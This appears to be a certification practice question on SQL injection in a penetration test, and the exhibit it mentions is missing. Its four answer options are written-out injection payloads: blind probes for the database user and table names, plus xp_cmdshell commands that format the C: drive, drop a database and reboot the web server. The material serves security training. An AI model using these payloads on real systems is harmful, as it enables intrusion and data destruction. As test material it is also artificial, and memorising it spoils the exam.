ECCouncil Exam Questions

What is the next step you should do?

Exhibit:

You are conducting a pen-test against a company’s website using SQL injection techniques. You enter “anything or 1=1-” in the username field of an authentication form. This is the output returned from the server.

What is the next step you should do?

A.
Identify the user context of the web application by running:
http://www.example.com/order/include_rsa.asp?pressReleaseID=5 AND USER_NAME() = 'dbo'

B.
Identify the database and table name by running:
http://www.example.com/order/include_rsa.asp?pressReleaseID=5 AND ascii(lower(substring((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'),1))) > 109

C.
Format the C: drive and delete the database by running:
http://www.example.com/order/include_rsa.asp?pressReleaseID=5 AND xp_cmdshell 'format c: /q /yes '; drop database myDB; --

D.
Reboot the web server by running:
http://www.example.com/order/include_rsa.asp?pressReleaseID=5 AND xp_cmdshell 'iisreset -reboot'; --